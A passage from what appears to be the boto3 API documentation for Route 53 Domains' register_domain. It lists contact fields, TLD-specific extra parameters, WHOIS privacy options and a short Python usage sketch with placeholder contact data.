Spain)\nPOLITICAL_PARTY\nPROFESSIONAL_ASSOCIATION\nPUBLIC_LAW_ASSOCIATION\nPUBLIC_LIMITED_COMPANY\nREGIONAL_GOVERNMENT_BODY\nREGIONAL_PUBLIC_ENTITY\nSAVINGS_BANK\nSPANISH_OFFICE\nSPORTS_ASSOCIATION\nSPORTS_FEDERATION\nSPORTS_LIMITED_COMPANY\nTEMPORARY_ALLIANCE_OF_ENTERPRISES\nTRADE_UNION\nWORKER_OWNED_COMPANY\nWORKER_OWNED_LIMITED_COMPANY\n\n.fi\n\nBIRTH_DATE_IN_YYYY_MM_DD\nFI_BUSINESS_NUMBER\nFI_ID_NUMBER\nFI_NATIONALITY Valid values include the following:\nFINNISH\nNOT_FINNISH\n\n\nFI_ORGANIZATION_TYPE Valid values include the 
following:\nCOMPANY\nCORPORATION\nGOVERNMENT\nINSTITUTION\nPOLITICAL_PARTY\nPUBLIC_COMMUNITY\nTOWNSHIP\n\n.fr\n\nBIRTH_CITY\nBIRTH_COUNTRY\nBIRTH_DATE_IN_YYYY_MM_DD\nBIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .\nBRAND_NUMBER.it\n\nIT_NATIONALITY\nIT_PIN\nIT_REGISTRANT_ENTITY_TYPE Valid values include the following:\nFOREIGNERS\nFREELANCE_WORKERS (Freelance workers and professionals)\nITALIAN_COMPANIES (Italian companies and one-person companies)\nNON_PROFIT_ORGANIZATIONS\nOTHER_SUBJECTS\nPUBLIC_ORGANIZATIONS\n\n.ru\n\nBIRTH_DATE_IN_YYYY_MM_DD\nRU_PASSPORT_DATA.se\n\nBIRTH_COUNTRY\nSE_ID_NUMBER.sg\n\nSG_ID_NUMBER.co.uk, .me.uk, and .org.uk\n\nUK_CONTACT_TYPE Valid values include the following:\nCRC (UK Corporation by Royal Charter)\nFCORP (Non-UK Corporation)\nFIND (Non-UK Individual, representing self)\nFOTHER (Non-UK Entity that does not fit into any other category)\nGOV (UK Government Body)\nIND (UK Individual (representing self))\nIP (UK Industrial/Provident Registered Company)\nLLP (UK Limited Liability Partnership)\nLTD (UK Limited Company)\nOTHER (UK Entity that does not fit into any other category)\nPLC (UK Public Limited Company)\nPTNR (UK Partnership)\nRCHAR (UK Registered Charity)\nSCH (UK School)\nSTAT (UK Statutory Body)\nSTRA (UK Sole Trader)\n\n\nUK_COMPANY_NUMBER\n\nIn addition, many TLDs require a VAT_NUMBER .\n\nValue (string) -- [REQUIRED]The value that corresponds with the name of an extra parameter.\n\n\n\n\n\n\n
:type RegistrantContact: dict
:param RegistrantContact: [REQUIRED]\nProvides detailed contact information. For information about the values that you specify for each element, see ContactDetail .\n\nFirstName (string) --First name of contact.\n\nLastName (string) --Last name of contact.\n\nContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:\n\nIf you specify a value other than PERSON , you must also specify a value for OrganizationName .\nFor some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide\nFor .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .\n\n\nOrganizationName (string) --Name of the organization for contact types other than PERSON .\n\nAddressLine1 (string) --First line of the contact\'s address.\n\nAddressLine2 (string) --Second line of contact\'s address, if any.\n\nCity (string) --The city of the contact\'s address.\n\nState (string) --The state or province of the contact\'s city.\n\nCountryCode (string) --Code for the country of the contact\'s address.\n\nZipCode (string) --The zip or postal code of the contact\'s address.\n\nPhoneNumber (string) --The phone number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code>]'. For example, a US phone number might appear as '+1.1234567890' .\n\nEmail (string) --Email address of the contact.\n\nFax (string) --Fax number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code]'. For example, a US phone number might appear as '+1.1234567890' .\n\nExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.\n\n(dict) --ExtraParam includes the following elements.\n\nName (string) -- [REQUIRED]The name of an additional parameter that is required by a top-level domain. 
Here are the top-level domains that require additional parameters and the names of the parameters that they require:\n\n.com.au and .net.au\n\nAU_ID_NUMBER\nAU_ID_TYPE Valid values include the following:\nABN (Australian business number)\nACN (Australian company number)\nTM (Trademark number)\n\n.ca\n\nBRAND_NUMBER\nCA_BUSINESS_ENTITY_TYPE Valid values include the following:\nBANK (Bank)\nCOMMERCIAL_COMPANY (Commercial company)\nCOMPANY (Company)\nCOOPERATION (Cooperation)\nCOOPERATIVE (Cooperative)\nCOOPRIX (Cooprix)\nCORP (Corporation)\nCREDIT_UNION (Credit union)\nFOMIA (Federation of mutual insurance associations)\nINC (Incorporated)\nLTD (Limited)\nLTEE (Limit\xc3\xa9e)\nLLC (Limited liability corporation)\nLLP (Limited liability partnership)\nLTE (Lte.)\nMBA (Mutual benefit association)\nMIC (Mutual insurance company)\nNFP (Not-for-profit corporation)\nSA (S.A.)\nSAVINGS_COMPANY (Savings company)\nSAVINGS_UNION (Savings union)\nSARL (Soci\xc3\xa9t\xc3\xa9 \xc3\xa0 responsabilit\xc3\xa9 limit\xc3\xa9e)\nTRUST (Trust)\nULC (Unlimited liability corporation)\n\n\nCA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:\nABO (Aboriginal Peoples indigenous to Canada)\nCCT (Canadian citizen)\nLGR (Legal Representative of a Canadian Citizen or Permanent Resident)\nRES (Permanent resident of Canada)\n\n\n\nWhen ContactType is a value other than PERSON , valid values include the following:\n\n\nASS (Canadian unincorporated association)\nCCO (Canadian corporation)\nEDU (Canadian educational institution)\nGOV (Government or government entity in Canada)\nHOP (Canadian Hospital)\nINB (Indian Band recognized by the Indian Act of Canada)\nLAM (Canadian Library, Archive, or Museum)\nMAJ (Her/His Majesty the Queen/King)\nOMK (Official mark registered in Canada)\nPLT (Canadian Political Party)\nPRT (Partnership Registered in Canada)\nTDM (Trademark registered in Canada)\nTRD (Canadian Trade Union)\nTRS (Trust established in Canada)\n\n.es\n\n\nES_IDENTIFICATION Specify the applicable value:\nFor contacts inside Spain: Enter your passport ID.\nFor contacts outside of Spain: Enter the VAT identification number for the company.\n\n\nNote\nFor .es domains, the value of ContactType must be PERSON .\n\n\nES_IDENTIFICATION_TYPE Valid values include the following:\nDNI_AND_NIF (For Spanish contacts)\nNIE (For foreigners with legal residence)\nOTHER (For contacts outside of Spain)\n\n\nES_LEGAL_FORM Valid values include the following:\nASSOCIATION\nCENTRAL_GOVERNMENT_BODY\nCIVIL_SOCIETY\nCOMMUNITY_OF_OWNERS\nCOMMUNITY_PROPERTY\nCONSULATE\nCOOPERATIVE\nDESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL\nECONOMIC_INTEREST_GROUP\nEMBASSY\nENTITY_MANAGING_NATURAL_AREAS\nFARM_PARTNERSHIP\nFOUNDATION\nGENERAL_AND_LIMITED_PARTNERSHIP\nGENERAL_PARTNERSHIP\nINDIVIDUAL\nLIMITED_COMPANY\nLOCAL_AUTHORITY\nLOCAL_PUBLIC_ENTITY\nMUTUAL_INSURANCE_COMPANY\nNATIONAL_PUBLIC_ENTITY\nORDER_OR_RELIGIOUS_INSTITUTION\nOTHERS (Only for contacts outside of Spain)\nPOLITICAL_PARTY\nPROFESSIONAL_ASSOCIATION\nPUBLIC_LAW_ASSOCIATION\nPUBLIC_LIMITED_COMPANY\nREGIONAL_GOVERNMENT_BODY\nREGIONAL_PUBLIC_ENTITY\nSAVINGS_BANK\nSPANISH_OFFICE\nSPORTS_ASSOCIATION\nSPORTS_FEDERATION\nSPORTS_LIMITED_COMPANY\nTEMPORARY_ALLIANCE_OF_ENTERPRISES\nTRADE_UNION\nWORKER_OWNED_COMPANY\nWORKER_OWNED_LIMITED_COMPANY\n\n.fi\n\nBIRTH_DATE_IN_YYYY_MM_DD\nFI_BUSINESS_NUMBER\nFI_ID_NUMBER\nFI_NATIONALITY Valid values include the following:\nFINNISH\nNOT_FINNISH\n\n\nFI_ORGANIZATION_TYPE Valid values include the 
following:\nCOMPANY\nCORPORATION\nGOVERNMENT\nINSTITUTION\nPOLITICAL_PARTY\nPUBLIC_COMMUNITY\nTOWNSHIP\n\n.fr\n\nBIRTH_CITY\nBIRTH_COUNTRY\nBIRTH_DATE_IN_YYYY_MM_DD\nBIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .\nBRAND_NUMBER.it\n\nIT_NATIONALITY\nIT_PIN\nIT_REGISTRANT_ENTITY_TYPE Valid values include the following:\nFOREIGNERS\nFREELANCE_WORKERS (Freelance workers and professionals)\nITALIAN_COMPANIES (Italian companies and one-person companies)\nNON_PROFIT_ORGANIZATIONS\nOTHER_SUBJECTS\nPUBLIC_ORGANIZATIONS\n\n.ru\n\nBIRTH_DATE_IN_YYYY_MM_DD\nRU_PASSPORT_DATA.se\n\nBIRTH_COUNTRY\nSE_ID_NUMBER.sg\n\nSG_ID_NUMBER.co.uk, .me.uk, and .org.uk\n\nUK_CONTACT_TYPE Valid values include the following:\nCRC (UK Corporation by Royal Charter)\nFCORP (Non-UK Corporation)\nFIND (Non-UK Individual, representing self)\nFOTHER (Non-UK Entity that does not fit into any other category)\nGOV (UK Government Body)\nIND (UK Individual (representing self))\nIP (UK Industrial/Provident Registered Company)\nLLP (UK Limited Liability Partnership)\nLTD (UK Limited Company)\nOTHER (UK Entity that does not fit into any other category)\nPLC (UK Public Limited Company)\nPTNR (UK Partnership)\nRCHAR (UK Registered Charity)\nSCH (UK School)\nSTAT (UK Statutory Body)\nSTRA (UK Sole Trader)\n\n\nUK_COMPANY_NUMBER\n\nIn addition, many TLDs require a VAT_NUMBER .\n\nValue (string) -- [REQUIRED]The value that corresponds with the name of an extra parameter.\n\n\n\n\n\n\n
:type TechContact: dict
:param TechContact: [REQUIRED]\nProvides detailed contact information. For information about the values that you specify for each element, see ContactDetail .\n\nFirstName (string) --First name of contact.\n\nLastName (string) --Last name of contact.\n\nContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:\n\nIf you specify a value other than PERSON , you must also specify a value for OrganizationName .\nFor some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide\nFor .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .\n\n\nOrganizationName (string) --Name of the organization for contact types other than PERSON .\n\nAddressLine1 (string) --First line of the contact\'s address.\n\nAddressLine2 (string) --Second line of contact\'s address, if any.\n\nCity (string) --The city of the contact\'s address.\n\nState (string) --The state or province of the contact\'s city.\n\nCountryCode (string) --Code for the country of the contact\'s address.\n\nZipCode (string) --The zip or postal code of the contact\'s address.\n\nPhoneNumber (string) --The phone number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code>]'. For example, a US phone number might appear as '+1.1234567890' .\n\nEmail (string) --Email address of the contact.\n\nFax (string) --Fax number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code]'. For example, a US phone number might appear as '+1.1234567890' .\n\nExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.\n\n(dict) --ExtraParam includes the following elements.\n\nName (string) -- [REQUIRED]The name of an additional parameter that is required by a top-level domain. 
Here are the top-level domains that require additional parameters and the names of the parameters that they require:\n\n.com.au and .net.au\n\nAU_ID_NUMBER\nAU_ID_TYPE Valid values include the following:\nABN (Australian business number)\nACN (Australian company number)\nTM (Trademark number)\n\n.ca\n\nBRAND_NUMBER\nCA_BUSINESS_ENTITY_TYPE Valid values include the following:\nBANK (Bank)\nCOMMERCIAL_COMPANY (Commercial company)\nCOMPANY (Company)\nCOOPERATION (Cooperation)\nCOOPERATIVE (Cooperative)\nCOOPRIX (Cooprix)\nCORP (Corporation)\nCREDIT_UNION (Credit union)\nFOMIA (Federation of mutual insurance associations)\nINC (Incorporated)\nLTD (Limited)\nLTEE (Limit\xc3\xa9e)\nLLC (Limited liability corporation)\nLLP (Limited liability partnership)\nLTE (Lte.)\nMBA (Mutual benefit association)\nMIC (Mutual insurance company)\nNFP (Not-for-profit corporation)\nSA (S.A.)\nSAVINGS_COMPANY (Savings company)\nSAVINGS_UNION (Savings union)\nSARL (Soci\xc3\xa9t\xc3\xa9 \xc3\xa0 responsabilit\xc3\xa9 limit\xc3\xa9e)\nTRUST (Trust)\nULC (Unlimited liability corporation)\n\n\nCA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:\nABO (Aboriginal Peoples indigenous to Canada)\nCCT (Canadian citizen)\nLGR (Legal Representative of a Canadian Citizen or Permanent Resident)\nRES (Permanent resident of Canada)\n\n\n\nWhen ContactType is a value other than PERSON , valid values include the following:\n\n\nASS (Canadian unincorporated association)\nCCO (Canadian corporation)\nEDU (Canadian educational institution)\nGOV (Government or government entity in Canada)\nHOP (Canadian Hospital)\nINB (Indian Band recognized by the Indian Act of Canada)\nLAM (Canadian Library, Archive, or Museum)\nMAJ (Her/His Majesty the Queen/King)\nOMK (Official mark registered in Canada)\nPLT (Canadian Political Party)\nPRT (Partnership Registered in Canada)\nTDM (Trademark registered in Canada)\nTRD (Canadian Trade Union)\nTRS (Trust established in Canada)\n\n.es\n\n\nES_IDENTIFICATION Specify the applicable value:\nFor contacts inside Spain: Enter your passport ID.\nFor contacts outside of Spain: Enter the VAT identification number for the company.\n\n\nNote\nFor .es domains, the value of ContactType must be PERSON .\n\n\nES_IDENTIFICATION_TYPE Valid values include the following:\nDNI_AND_NIF (For Spanish contacts)\nNIE (For foreigners with legal residence)\nOTHER (For contacts outside of Spain)\n\n\nES_LEGAL_FORM Valid values include the following:\nASSOCIATION\nCENTRAL_GOVERNMENT_BODY\nCIVIL_SOCIETY\nCOMMUNITY_OF_OWNERS\nCOMMUNITY_PROPERTY\nCONSULATE\nCOOPERATIVE\nDESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL\nECONOMIC_INTEREST_GROUP\nEMBASSY\nENTITY_MANAGING_NATURAL_AREAS\nFARM_PARTNERSHIP\nFOUNDATION\nGENERAL_AND_LIMITED_PARTNERSHIP\nGENERAL_PARTNERSHIP\nINDIVIDUAL\nLIMITED_COMPANY\nLOCAL_AUTHORITY\nLOCAL_PUBLIC_ENTITY\nMUTUAL_INSURANCE_COMPANY\nNATIONAL_PUBLIC_ENTITY\nORDER_OR_RELIGIOUS_INSTITUTION\nOTHERS (Only for contacts outside of Spain)\nPOLITICAL_PARTY\nPROFESSIONAL_ASSOCIATION\nPUBLIC_LAW_ASSOCIATION\nPUBLIC_LIMITED_COMPANY\nREGIONAL_GOVERNMENT_BODY\nREGIONAL_PUBLIC_ENTITY\nSAVINGS_BANK\nSPANISH_OFFICE\nSPORTS_ASSOCIATION\nSPORTS_FEDERATION\nSPORTS_LIMITED_COMPANY\nTEMPORARY_ALLIANCE_OF_ENTERPRISES\nTRADE_UNION\nWORKER_OWNED_COMPANY\nWORKER_OWNED_LIMITED_COMPANY\n\n.fi\n\nBIRTH_DATE_IN_YYYY_MM_DD\nFI_BUSINESS_NUMBER\nFI_ID_NUMBER\nFI_NATIONALITY Valid values include the following:\nFINNISH\nNOT_FINNISH\n\n\nFI_ORGANIZATION_TYPE Valid values include the 
following:\nCOMPANY\nCORPORATION\nGOVERNMENT\nINSTITUTION\nPOLITICAL_PARTY\nPUBLIC_COMMUNITY\nTOWNSHIP\n\n.fr\n\nBIRTH_CITY\nBIRTH_COUNTRY\nBIRTH_DATE_IN_YYYY_MM_DD\nBIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .\nBRAND_NUMBER.it\n\nIT_NATIONALITY\nIT_PIN\nIT_REGISTRANT_ENTITY_TYPE Valid values include the following:\nFOREIGNERS\nFREELANCE_WORKERS (Freelance workers and professionals)\nITALIAN_COMPANIES (Italian companies and one-person companies)\nNON_PROFIT_ORGANIZATIONS\nOTHER_SUBJECTS\nPUBLIC_ORGANIZATIONS\n\n.ru\n\nBIRTH_DATE_IN_YYYY_MM_DD\nRU_PASSPORT_DATA.se\n\nBIRTH_COUNTRY\nSE_ID_NUMBER.sg\n\nSG_ID_NUMBER.co.uk, .me.uk, and .org.uk\n\nUK_CONTACT_TYPE Valid values include the following:\nCRC (UK Corporation by Royal Charter)\nFCORP (Non-UK Corporation)\nFIND (Non-UK Individual, representing self)\nFOTHER (Non-UK Entity that does not fit into any other category)\nGOV (UK Government Body)\nIND (UK Individual (representing self))\nIP (UK Industrial/Provident Registered Company)\nLLP (UK Limited Liability Partnership)\nLTD (UK Limited Company)\nOTHER (UK Entity that does not fit into any other category)\nPLC (UK Public Limited Company)\nPTNR (UK Partnership)\nRCHAR (UK Registered Charity)\nSCH (UK School)\nSTAT (UK Statutory Body)\nSTRA (UK Sole Trader)\n\n\nUK_COMPANY_NUMBER\n\nIn addition, many TLDs require a VAT_NUMBER .\n\nValue (string) -- [REQUIRED]The value that corresponds with the name of an extra parameter.\n\n\n\n\n\n\n
:type PrivacyProtectAdminContact: boolean
:param PrivacyProtectAdminContact: Whether you want to conceal contact information from WHOIS queries. If you specify true , WHOIS ('who is') queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If you specify false , WHOIS queries return the information that you entered for the admin contact.\nDefault: true\n
:type PrivacyProtectRegistrantContact: boolean
:param PrivacyProtectRegistrantContact: Whether you want to conceal contact information from WHOIS queries. If you specify true , WHOIS ('who is') queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If you specify false , WHOIS queries return the information that you entered for the registrant contact (the domain owner).\nDefault: true\n
:type PrivacyProtectTechContact: boolean
:param PrivacyProtectTechContact: Whether you want to conceal contact information from WHOIS queries. If you specify true , WHOIS ('who is') queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If you specify false , WHOIS queries return the information that you entered for the technical contact.\nDefault: true\n
:rtype: dict
ReturnsResponse Syntax
{
'OperationId': 'string'
}
Response Structure
(dict) --
The RegisterDomain response includes the following element.
OperationId (string) --
Identifier for tracking the progress of the request. To query the operation status, use GetOperationDetail .
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
Route53Domains.Client.exceptions.DuplicateRequest
Route53Domains.Client.exceptions.TLDRulesViolation
Route53Domains.Client.exceptions.DomainLimitExceeded
Route53Domains.Client.exceptions.OperationLimitExceeded
:return: {
'OperationId': 'string'
}
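Usage sketch (illustrative only; every contact value below is a placeholder, and a successful call registers a domain and incurs charges):
    import boto3
    client = boto3.client('route53domains')
    contact = {
        'FirstName': 'Jane', 'LastName': 'Doe', 'ContactType': 'PERSON',
        'AddressLine1': '123 Any Street', 'City': 'Anytown', 'State': 'WA',
        'CountryCode': 'US', 'ZipCode': '98101',
        'PhoneNumber': '+1.2065550100', 'Email': 'jane@example.com'
    }
    response = client.register_domain(
        DomainName='example.com',
        DurationInYears=1,
        AdminContact=contact,
        RegistrantContact=contact,
        TechContact=contact
    )
    print(response['OperationId'])  # poll with get_operation_detail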
:returns:
DomainName (string) -- [REQUIRED]
The domain name that you want to register. The top-level domain (TLD), such as .com, must be a TLD that Route 53 supports. For a list of supported TLDs, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide .
The domain name can contain only the following characters:
Letters a through z. Domain names are not case sensitive.
Numbers 0 through 9.
Hyphen (-). You can\'t specify a hyphen at the beginning or end of a label.
Period (.) to separate the labels in the name, such as the . in example.com .
Internationalized domain names are not supported for some top-level domains. To determine whether the TLD that you want to use supports internationalized domain names, see Domains that You Can Register with Amazon Route 53 . For more information, see Formatting Internationalized Domain Names .
IdnLangCode (string) -- Reserved for future use.
DurationInYears (integer) -- [REQUIRED]
The number of years that you want to register the domain for. Domains are registered for a minimum of one year. The maximum period depends on the top-level domain. For the range of valid values for your domain, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide .
Default: 1
AutoRenew (boolean) -- Indicates whether the domain will be automatically renewed (true ) or not (false ). Autorenewal only takes effect after the account is charged.
Default: true
AdminContact (dict) -- [REQUIRED]
Provides detailed contact information. For information about the values that you specify for each element, see ContactDetail .
FirstName (string) --First name of contact.
LastName (string) --Last name of contact.
ContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:
If you specify a value other than PERSON , you must also specify a value for OrganizationName .
For some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide
For .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .
OrganizationName (string) --Name of the organization for contact types other than PERSON .
AddressLine1 (string) --First line of the contact\'s address.
AddressLine2 (string) --Second line of contact\'s address, if any.
City (string) --The city of the contact\'s address.
State (string) --The state or province of the contact\'s city.
CountryCode (string) --Code for the country of the contact\'s address.
ZipCode (string) --The zip or postal code of the contact\'s address.
PhoneNumber (string) --The phone number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code]". For example, a US phone number might appear as "+1.1234567890" .
Email (string) --Email address of the contact.
Fax (string) --Fax number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code]". For example, a US phone number might appear as "+1.1234567890" .
ExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.
(dict) --ExtraParam includes the following elements.
Name (string) -- [REQUIRED]The name of an additional parameter that is required by a top-level domain. Here are the top-level domains that require additional parameters and the names of the parameters that they require:
.com.au and .net.au
AU_ID_NUMBER
AU_ID_TYPE Valid values include the following:
ABN (Australian business number)
ACN (Australian company number)
TM (Trademark number)
.ca
BRAND_NUMBER
CA_BUSINESS_ENTITY_TYPE Valid values include the following:
BANK (Bank)
COMMERCIAL_COMPANY (Commercial company)
COMPANY (Company)
COOPERATION (Cooperation)
COOPERATIVE (Cooperative)
COOPRIX (Cooprix)
CORP (Corporation)
CREDIT_UNION (Credit union)
FOMIA (Federation of mutual insurance associations)
INC (Incorporated)
LTD (Limited)
LTEE (Limitée)
LLC (Limited liability corporation)
LLP (Limited liability partnership)
LTE (Lte.)
MBA (Mutual benefit association)
MIC (Mutual insurance company)
NFP (Not-for-profit corporation)
SA (S.A.)
SAVINGS_COMPANY (Savings company)
SAVINGS_UNION (Savings union)
SARL (Société à responsabilité limitée)
TRUST (Trust)
ULC (Unlimited liability corporation)
CA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:
ABO (Aboriginal Peoples indigenous to Canada)
CCT (Canadian citizen)
LGR (Legal Representative of a Canadian Citizen or Permanent Resident)
RES (Permanent resident of Canada)
When ContactType is a value other than PERSON , valid values include the following:
ASS (Canadian unincorporated association)
CCO (Canadian corporation)
EDU (Canadian educational institution)
GOV (Government or government entity in Canada)
HOP (Canadian Hospital)
INB (Indian Band recognized by the Indian Act of Canada)
LAM (Canadian Library, Archive, or Museum)
MAJ (Her/His Majesty the Queen/King)
OMK (Official mark registered in Canada)
PLT (Canadian Political Party)
PRT (Partnership Registered in Canada)
TDM (Trademark registered in Canada)
TRD (Canadian Trade Union)
TRS (Trust established in Canada)
.es
ES_IDENTIFICATION Specify the applicable value:
For contacts inside Spain: Enter your passport ID.
For contacts outside of Spain: Enter the VAT identification number for the company.
Note
For .es domains, the value of ContactType must be PERSON .
ES_IDENTIFICATION_TYPE Valid values include the following:
DNI_AND_NIF (For Spanish contacts)
NIE (For foreigners with legal residence)
OTHER (For contacts outside of Spain)
ES_LEGAL_FORM Valid values include the following:
ASSOCIATION
CENTRAL_GOVERNMENT_BODY
CIVIL_SOCIETY
COMMUNITY_OF_OWNERS
COMMUNITY_PROPERTY
CONSULATE
COOPERATIVE
DESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL
ECONOMIC_INTEREST_GROUP
EMBASSY
ENTITY_MANAGING_NATURAL_AREAS
FARM_PARTNERSHIP
FOUNDATION
GENERAL_AND_LIMITED_PARTNERSHIP
GENERAL_PARTNERSHIP
INDIVIDUAL
LIMITED_COMPANY
LOCAL_AUTHORITY
LOCAL_PUBLIC_ENTITY
MUTUAL_INSURANCE_COMPANY
NATIONAL_PUBLIC_ENTITY
ORDER_OR_RELIGIOUS_INSTITUTION
OTHERS (Only for contacts outside of Spain)
POLITICAL_PARTY
PROFESSIONAL_ASSOCIATION
PUBLIC_LAW_ASSOCIATION
PUBLIC_LIMITED_COMPANY
REGIONAL_GOVERNMENT_BODY
REGIONAL_PUBLIC_ENTITY
SAVINGS_BANK
SPANISH_OFFICE
SPORTS_ASSOCIATION
SPORTS_FEDERATION
SPORTS_LIMITED_COMPANY
TEMPORARY_ALLIANCE_OF_ENTERPRISES
TRADE_UNION
WORKER_OWNED_COMPANY
WORKER_OWNED_LIMITED_COMPANY
.fi
BIRTH_DATE_IN_YYYY_MM_DD
FI_BUSINESS_NUMBER
FI_ID_NUMBER
FI_NATIONALITY Valid values include the following:
FINNISH
NOT_FINNISH
FI_ORGANIZATION_TYPE Valid values include the following:
COMPANY
CORPORATION
GOVERNMENT
INSTITUTION
POLITICAL_PARTY
PUBLIC_COMMUNITY
TOWNSHIP
.fr
BIRTH_CITY
BIRTH_COUNTRY
BIRTH_DATE_IN_YYYY_MM_DD
BIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .
BRAND_NUMBER
.it
IT_NATIONALITY
IT_PIN
IT_REGISTRANT_ENTITY_TYPE Valid values include the following:
FOREIGNERS
FREELANCE_WORKERS (Freelance workers and professionals)
ITALIAN_COMPANIES (Italian companies and one-person companies)
NON_PROFIT_ORGANIZATIONS
OTHER_SUBJECTS
PUBLIC_ORGANIZATIONS
.ru
BIRTH_DATE_IN_YYYY_MM_DD
RU_PASSPORT_DATA
.se
BIRTH_COUNTRY
SE_ID_NUMBER
.sg
SG_ID_NUMBER
.co.uk, .me.uk, and .org.uk
UK_CONTACT_TYPE Valid values include the following:
CRC (UK Corporation by Royal Charter)
FCORP (Non-UK Corporation)
FIND (Non-UK Individual, representing self)
FOTHER (Non-UK Entity that does not fit into any other category)
GOV (UK Government Body)
IND (UK Individual (representing self))
IP (UK Industrial/Provident Registered Company)
LLP (UK Limited Liability Partnership)
LTD (UK Limited Company)
OTHER (UK Entity that does not fit into any other category)
PLC (UK Public Limited Company)
PTNR (UK Partnership)
RCHAR (UK Registered Charity)
SCH (UK School)
STAT (UK Statutory Body)
STRA (UK Sole Trader)
UK_COMPANY_NUMBER
In addition, many TLDs require a VAT_NUMBER .
Value (string) -- [REQUIRED]The value that corresponds with the name of an extra parameter.
RegistrantContact (dict) -- [REQUIRED]
Provides detailed contact information. For information about the values that you specify for each element, see ContactDetail .
FirstName (string) --First name of contact.
LastName (string) --Last name of contact.
ContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:
If you specify a value other than PERSON , you must also specify a value for OrganizationName .
For some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide
For .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .
OrganizationName (string) --Name of the organization for contact types other than PERSON .
AddressLine1 (string) --First line of the contact\'s address.
AddressLine2 (string) --Second line of contact\'s address, if any.
City (string) --The city of the contact\'s address.
State (string) --The state or province of the contact\'s city.
CountryCode (string) --Code for the country of the contact\'s address.
ZipCode (string) --The zip or postal code of the contact\'s address.
PhoneNumber (string) --The phone number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code]". For example, a US phone number might appear as "+1.1234567890" .
Email (string) --Email address of the contact.
Fax (string) --Fax number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code]". For example, a US phone number might appear as "+1.1234567890" .
ExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.
(dict) --ExtraParam includes the following elements.
Name (string) -- [REQUIRED]The name of an additional parameter that is required by a top-level domain. Here are the top-level domains that require additional parameters and the names of the parameters that they require:
.com.au and .net.au
AU_ID_NUMBER
AU_ID_TYPE Valid values include the following:
ABN (Australian business number)
ACN (Australian company number)
TM (Trademark number)
.ca
BRAND_NUMBER
CA_BUSINESS_ENTITY_TYPE Valid values include the following:
BANK (Bank)
COMMERCIAL_COMPANY (Commercial company)
COMPANY (Company)
COOPERATION (Cooperation)
COOPERATIVE (Cooperative)
COOPRIX (Cooprix)
CORP (Corporation)
CREDIT_UNION (Credit union)
FOMIA (Federation of mutual insurance associations)
INC (Incorporated)
LTD (Limited)
LTEE (Limitée)
LLC (Limited liability corporation)
LLP (Limited liability partnership)
LTE (Lte.)
MBA (Mutual benefit association)
MIC (Mutual insurance company)
NFP (Not-for-profit corporation)
SA (S.A.)
SAVINGS_COMPANY (Savings company)
SAVINGS_UNION (Savings union)
SARL (Société à responsabilité limitée)
TRUST (Trust)
ULC (Unlimited liability corporation)
CA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:
ABO (Aboriginal Peoples indigenous to Canada)
CCT (Canadian citizen)
LGR (Legal Representative of a Canadian Citizen or Permanent Resident)
RES (Permanent resident of Canada)
When ContactType is a value other than PERSON , valid values include the following:
ASS (Canadian unincorporated association)
